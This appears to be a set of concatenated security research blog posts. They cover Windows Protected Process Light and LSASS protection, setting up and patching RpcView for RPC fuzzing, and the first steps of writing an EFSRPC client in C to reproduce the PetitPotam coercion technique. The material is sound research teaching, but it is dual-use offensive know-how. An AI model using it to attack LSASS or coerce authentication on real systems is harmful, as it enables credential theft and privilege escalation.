2    lsass.exe    Protected Light  Lsa          PsProtectedSignerLsa-Light
3    MsMpEng.exe  Protected Light  Antimalware  PsProtectedSignerAntimalware-Light

These 3 PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege, so user rights are not a concern in this example. It all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it can access the two other processes. Then, lsass.exe can access MsMpEng.exe as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe cannot access either of the other two processes because it has the lowest level.

Conclusion

In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes. This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want and you could well completely disable the protection of any Protected Process. Of course, this has become a bit more complicated over the years as you are now required to load a digitally signed driver, but this restriction can be worked around as we saw.

In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that “LSASS” has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g.: “WININIT”), would still be able to open it with full access.

There is one aspect of PP/PPL that I did not mention though. The “L” in “PPL” is here for a reason. Indeed, with the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks.

Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I’ll keep you posted on Twitter. The best is yet to come, so stay tuned!

Update 2021-04-25 – The second part is now available here: Bypassing LSA Protection in Userland

Links & Resources

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE), including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes them a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting by modifying the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

  • Visual Studio 2019 (Community)
  • CMake >= 3.13.2
  • Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once Visual Studio is installed, you have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is: how do you find and download Qt5 5.15.2? That’s where things get tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you leave all the values at their defaults, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to download all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of this file, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
};

We can see that each version number is represented as a 64-bit integer, with 16 bits for each of the four version components. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041C = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
};

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bit compilation process, but if you want to compile the 32-bit version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

  • Qt is installed in C:\Qt\5.15.2\.
  • CMake is installed in C:\Program Files\CMake\.
  • The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).
mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is a section which is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.

This isn’t very convenient, but most Windows binaries have one redeeming quality: Microsoft publishes their associated PDB (Program DataBase) files.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

From RpcView to PetitPotam

In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool.

The Theory

Before diving into the main subject, I need to discuss some basic concepts first to make sure we are all on the same page. First, as I said in the previous post, DCE/RPC is one of the many IPC (InterProcess Communication) mechanisms used in Windows. It allows a process A - the RPC client - to invoke procedures or functions that are implemented and executed in a process B - the RPC server.

That being said, this raises some questions that I will quickly cover in the next paragraphs.

  • How does an RPC client distinguish an RPC server from another?
  • How does an RPC client know which procedures/functions are exposed by the RPC server?
  • How does an RPC client invoke the remote procedures/functions?

Interface Definition

I assume you are familiar with the concept of interface in the context of Object Oriented Programming (OOP). An interface is a sort of contract, consisting of a set of methods, that an Object must fulfill by implementing those said methods. With RPC, that’s exactly the same idea. The difference is that the methods are implemented in another process, and can even be accessed from a remote machine on the network.

If a client wants to consume an interface, they first need to know what is written in the interface’s contract. In other words, they need the following information:

  • The GUID of the interface: how to identify the interface?
  • A protocol sequence: how to interact with this interface?
  • An Opnum (i.e. a procedure ID): which procedure to call?
  • A set of parameters: what information does the server need in order to execute the procedure?

For that matter, the developer of an RPC server will usually release an IDL (Interface Definition Language) file. The purpose of this file is to provide the developer of an RPC client with all the information they need in order to consume this interface, without having to worry about its actual implementation on server-side. In a way, IDL for RPC interfaces is very similar to what WSDL/WADL are for web services and applications.

As an example, PetitPotam leverages the Encrypting File System Remote Protocol (EFSRPC), which is based on the EFSR interface. You can find the complete IDL file corresponding to this interface here, but I also included an extract below.

import "ms-dtyp.idl";

[
    uuid(c681d488-d850-11d0-8c52-00c04fd90f7e),
    version(1.0),
]

interface efsrpc
{
    typedef [context_handle] void * PEXIMPORT_CONTEXT_HANDLE;
    typedef pipe unsigned char EFS_EXIM_PIPE;
    
    /* [snip] */

    long EfsRpcOpenFileRaw(
        [in]            handle_t                   binding_h,
        [out]           PEXIMPORT_CONTEXT_HANDLE * hContext,
        [in, string]    wchar_t                  * FileName,
        [in]            long                       Flags
    );

    long EfsRpcReadFileRaw(
        [in]            PEXIMPORT_CONTEXT_HANDLE   hContext,
        [out]           EFS_EXIM_PIPE            * EfsOutPipe
    );

    /* [snip] */
}

In this file, we can find the UUID (Universal Unique Identifier) of the interface, some type definitions, and the prototype of the exposed procedures or functions. That’s all the information a client needs in order to invoke remote procedures.

Protocol Sequence

Knowing which procedures/functions are exposed by an interface isn’t actually sufficient to interact with it. The client also needs to know how to access this interface. The way a client talks to an RPC server is called the protocol sequence. Depending on the implementation of the RPC server, a given interface might even be accessible through multiple protocol sequences.

Generally speaking, Windows supports three protocols (source):

RPC Protocol Description
NCACN Network Computing Architecture connection-oriented protocol
NCADG Network Computing Architecture datagram protocol
NCALRPC Network Computing Architecture local remote procedure call

RPC protocols used for remote connections (NCACN and NCADG) through a network can be supported by many “transport” protocols. The most common transport protocol is obviously TCP/IP, but other more exotic protocols can also be used, such as IPX/SPX or AppleTalk DSP. The complete list of supported transport protocols is available here.

Although 14 Protocol Sequences are supported, only 4 of them are commonly used:

Protocol Sequence Description
ncacn_ip_tcp Connection-oriented Transmission Control Protocol/Internet Protocol (TCP/IP)
ncacn_np Connection-oriented named pipes
ncacn_http Connection-oriented TCP/IP using Microsoft Internet Information Server as HTTP proxy
ncalrpc Local procedure call

For instance, when using ncacn_np, the DCE/RPC requests are encapsulated inside SMB packets and sent to a remote named pipe. On the other hand, when using ncacn_ip_tcp, DCE/RPC requests are directly sent over TCP. I made the following diagram to illustrate these 4 protocol sequences.

Binding Handles

Once you know the definition of the interface and which protocol to use, you have (almost) all the information you need to connect or bind to the remote or local RPC server.

This concept is quite similar to how kernel object handles work. For example, when you want to write some data to a file, you first call CreateFile to open it. In return, the kernel gives you a handle that you can then use to write your data by passing the handle to WriteFile. Similarly, with RPC, you connect to an RPC server by creating a binding handle, that you can then use to invoke procedures or functions on the interface you requested access to. It’s as simple as that.

Note: this analogy is limited though as the RPC client initiates its own binding handle. The RPC server is then responsible for ensuring that the client has the appropriate privileges to invoke a given procedure.

Unlike with kernel object handles though, there are multiple types of binding handles: automatic, implicit and explicit. This type determines how much work a client has to do in order to initialize and/or manage the binding handle. In this post, I will cover only one example, but I made another diagram to illustrate these different cases.

For instance, if an RPC server requires the use of explicit binding handles, as a client, you have to write some code to create it first and then you have to explicitly pass it as an argument for each procedure call. On the other hand, if the server requires the use of automatic binding handles, you can just call a remote procedure, and the RPC runtime will take care of everything else, such as connecting to the server, passing the binding handle and closing it when it’s done.
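To make this a bit more concrete, here is roughly what each handle type looks like at the IDL/ACF level. The attribute names ([implicit_handle], [auto_handle]) are the documented MIDL ones, but the interface and variable names below are placeholders of my own:

```c
/* Explicit handle: declared as a regular parameter in the IDL file,
   exactly like binding_h in the EFSR interface shown earlier. */
long SomeProcedure(
    [in] handle_t binding_h,
    [in] long arg
);

/* Implicit handle: declared once in the ACF file; the client fills the
   global variable hExampleBinding and the stubs use it transparently. */
[implicit_handle(handle_t hExampleBinding)]
interface example
{
}

/* Automatic handle: the ACF attribute lets the RPC runtime create,
   manage and close the binding on its own. */
[auto_handle]
interface example
{
}
```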

The “PetitPotam” case

The EFSRPC protocol is widely documented here but, for the sake of this blog post, we will just pretend that this documentation does not exist. So, we will first see how we can collect all the information we need with RpcView. Then, we will see how we can use this information to write a simple RPC client application. Finally, we will use this RPC client application to experiment a bit and see what we can do with the exposed RPC procedures.

Exploring the EFSRPC Interface with RpcView

Let’s imagine we are randomly browsing the output of RpcView, searching for interesting procedure names. Since we downloaded the PDB files for all the DLLs that are in C:\Windows\System32 and we configured the appropriate path in the options (see part 1), this should feel pretty much like playing a video game. :nerd_face:

When clicking on the LSASS process (1), we can see that it contains many RPC interfaces. So we go through them one by one and we stop on the one with the GUID c681d488-d850-11d0-8c52-00c04fd90f7e (2) because it exposes several procedures that seem to perform file operations (according to their name) (3).

File operations initiated by low-privileged users and performed by privileged processes (such as services running as SYSTEM) are always interesting to investigate because they might lead to local privilege escalation (or even remote code execution in some cases). On top of that, they are relatively easy to find and visualize, using Process Monitor for instance.

In this example, RpcView provides other very useful information. It shows that the interface we selected is exposed through a named pipe: \pipe\lsass (4). It also shows us the name of the process, the path of the executable on disk and the user it runs as (5). Finally, we know that this interface is part of the “LSA extension for EFS”, which is implemented in C:\Windows\System32\efslsaext.dll (6).

Collecting all the Required Information

As I explained at the beginning of this post, in order to interact with an RPC server, a client needs some information: the ID of the interface, the protocol sequence to use and, last but not least, the definition of the interface itself. As we have seen in the previous part, RpcView already gives us the ID of the interface and the protocol sequence, but what about the interface’s definition?

  • ID of the interface: c681d488-d850-11d0-8c52-00c04fd90f7e
  • Protocol sequence: ncacn_np
  • Name of the endpoint: \pipe\lsass

And here comes what probably is the most powerful feature of RpcView. If you select the interface you are interested in, and right-click on it, you will see an option that allows you to “decompile” it. The “decompiled” IDL code will then appear in the “Decompilation” window right above it.

Although this feature is very powerful, it is not 100% reliable. So, don’t expect it to always produce a usable file, straight out of the box. Besides, some information such as the name of the structures is inevitably lost in the process. In the next parts, I will cover some common errors you may encounter when using the generated IDL file.

Creating an RPC Client for the EFSRPC Interface in C/C++

Now that we have all the information we need, we can create an RPC client in C/C++ and start playing around with the interface.

As I already explained how to install and set up Visual Studio, I won’t go through this step again in this post. Please note that I’m using Visual Studio Community 2019 and the latest version of the Windows 10 SDK is also installed. The versions should not be that important though as we are not doing anything fancy.

Let’s fire up Visual Studio and create a new C++ Console App project.

I will simply name this new project EfsrClient and save it in C:\Workspace.

Visual Studio will automatically create the file EfsrClient.cpp, which contains the main function along with some comments explaining how to compile and build the project. Usually, I get rid of these comments, and I rewrite the main function as follows, just to start with a clean file.

int wmain(int argc, wchar_t* argv[])
{
    
}

The next thing you want to do is go back to RpcView, select the “decompiled” interface definition, copy its content, and save it as a new file in your project. To do so, you can simply right-click on the “Source Files” folder, and then Add > New Item....

In the dialog box, we can select the C++ File (.cpp) template, and enter something like efsr.idl in the Name field. Although the template is not important, the extension of the file must be .idl because it determines which compiler Visual Studio will use for this file. In this case, it will use the MIDL compiler.

Once this is done, you should have a new file called efsr.idl in the “Source Files” folder. Next, we can right-click on our IDL file and compile it. But before doing so, make sure to select the appropriate target architecture: x86 or x64. Indeed, the MIDL compiler produces architecture-dependent code, so if you compile the IDL file for the x86 architecture and later decide to compile your application for the x64 architecture, you will most likely get into trouble.

If all goes well, you should see something like this in the Build Output window.

At this point, the MIDL compiler has created 3 files:

File Type Intended for Description
efsr_h.h Header file Client and Server Essentially function and structure definitions, well that’s a header file…
efsr_c.c Source file Client Code for the RPC runtime on client side
efsr_s.c Source file Server Code for the RPC runtime on server side, we don’t need this file

Although these files were created in the solution’s folder, they are not automatically added to the solution itself, so we need to do this manually.

  1. Right-click on the “Header Files” folder, Add > Existing Item... > efsr_h.h > Add.
  2. Right-click on the “Source Files” folder, Add > Existing Item... > efsr_c.c > Add.

Before going any further, we should make sure that both the header and the source files are well formed.

Here we can see that there is a problem with the file efsr_h.h. Some structure definitions were inserted between two function prototypes.

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out]pipe char* arg_1);

long Proc2_EfsRpcWriteFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [in]pipe char* arg_1);

If we check the definition of these two functions in the IDL file, we can see that the keyword pipe was inserted, but the MIDL compiler didn’t handle it properly. For now, we can simply remove this keyword and compile again.

Note: the type identified by RpcView was actually correct but, because of the syntax, the compiler failed to produce the correct output code. In the original IDL file, the type of arg_1 is EFS_EXIM_PIPE*, where EFS_EXIM_PIPE is indeed defined as a pipe unsigned char.

When dealing with IDL files generated by RpcView, this kind of error should be expected, as the “decompilation” process is not guaranteed to produce a 100% usable result straight out of the box. With time and practice though, you can quickly spot these issues and fix them.

After doing that, the header file looks much better. We no longer have syntax errors in this file.

The thing I usually do next is simply include the header file in the main source code, and compile as is to check if we have any errors.

#include "efsr_h.h"

int wmain(int argc, wchar_t* argv[])
{
    
}

Here we have 3 errors. The files were successfully compiled but the linker was not able to resolve some symbols: NdrClientCall3, MIDL_user_free, and MIDL_user_allocate.

First things first, the functions MIDL_user_allocate and MIDL_user_free are used to allocate and free memory for the RPC stubs. They are documented here and here. When implementing an RPC application, they must be defined somewhere in the application. It sounds more complicated than it really is though. In practice, we just have to add the following code to our main file.

void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR *) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR * p)
{
    free(p);
}

If we try to build the project again, we should see that the errors are now gone, and were replaced by two warnings that we can ignore.

One error remains though: the linker can’t find the NdrClientCall3 function. The NdrClientCall* functions are the cornerstone of the communication between the client and the server as they basically do all the heavy lifting on your behalf. Whenever you call a remote procedure, they serialize your parameters, send your request as a packet to the server, receive the response, deserialize it, and finally return the result.

As an example, here is what the definition of the EfsRpcOpenFileRaw procedure looks like in efsr_c.c. You can see that, on client side, EfsRpcOpenFileRaw basically consists of a “simple” call to NdrClientCall3.

long Proc0_EfsRpcOpenFileRaw_Downlevel( 
    /* [context_handle][out] */ void **arg_1,
    /* [string][in] */ wchar_t *arg_2,
    /* [in] */ long arg_3)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  0,
                  0,
                  arg_1,
                  arg_2,
                  arg_3);
    return ( long  )_RetVal.Simple;
}

Note: I intentionally did not modify the function names generated by RpcView to highlight the fact that they do not matter. In the end, the server just receives an Opnum value, which is a numeric value that identifies the procedure to call internally. In the case of EfsRpcOpenFileRaw, this value would be 0 (second argument of NdrClientCall3).

CLIENT_CALL_RETURN RPC_VAR_ENTRY NdrClientCall3(
  MIDL_STUBLESS_PROXY_INFO *pProxyInfo,
  unsigned long            nProcNum,
  void                     *pReturnValue,
  ...                      
);

Let’s return to our error message. When the linker is not able to resolve a function symbol, it usually means that we have to explicitly specify where it can find it. And by “where”, I mean “in which DLL”. This kind of information can usually be found in the documentation, so let’s check what we can find about the NdrClientCall3 function here.

The documentation tells us that the NdrClientCall3 function is exported by the RpcRT4.dll DLL. Nothing surprising as it’s the DLL that implements the RPC runtime (remember my previous post?). This means that we have to reference the RpcRT4.lib file in our application. To do so, I personally use the following directive rather than modifying the configuration of the project.

#pragma comment(lib, "RpcRT4.lib")

If you followed along, your code should look like this, and you should also be able to build the project.

Writing a PoC

We already went through a lot of steps at this point, and our application still does nothing. So it’s time to see how to invoke a remote procedure. This process usually goes like this.

  1. Call RpcStringBindingCompose to create the string representation of the binding; you can think of it as a URL.
  2. Call RpcBindingFromStringBinding to create the binding handle based on the previous binding string.
  3. Call RpcStringFree to free the binding string as we don’t need it anymore.
  4. Optionally call RpcBindingSetAuthInfo or RpcBindingSetAuthInfoEx to set explicit authentication information on our binding handle.
  5. Use the binding handle to invoke remote procedures.
  6. Call RpcBindingFree to free the binding handle.

In my case, this yields the following stub code:

#include "efsr_h.h"
#include <iostream>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER)
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Note: I would recommend invoking remote procedures inside a try/except block because exceptions are quite common in the context of the RPC runtime. Sometimes exceptions occur simply because the syntax of the request is incorrect but, in other cases, servers can also throw exceptions rather than returning an error code.

We can already compile this code and make sure everything is OK. RPC functions return an RPC_STATUS code. If they execute successfully, they return the value 0, which means RPC_S_OK. If that’s not the case, you can check the documentation here to determine what’s wrong, or you can even write a function to print the corresponding Win32 error message.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] RpcBindingFree status code: 0

Now that we have our binding handle, we can try and invoke the EfsRpcOpenFileRaw procedure. But wait… There is a problem with the function’s prototype. It doesn’t take a binding handle as an argument.

If we go back to the definition of the function in the IDL file, we can see that there is indeed an issue. The argument list should start with arg_0, as shown in the next procedure, EfsRpcReadFileRaw. Therefore, something is missing.

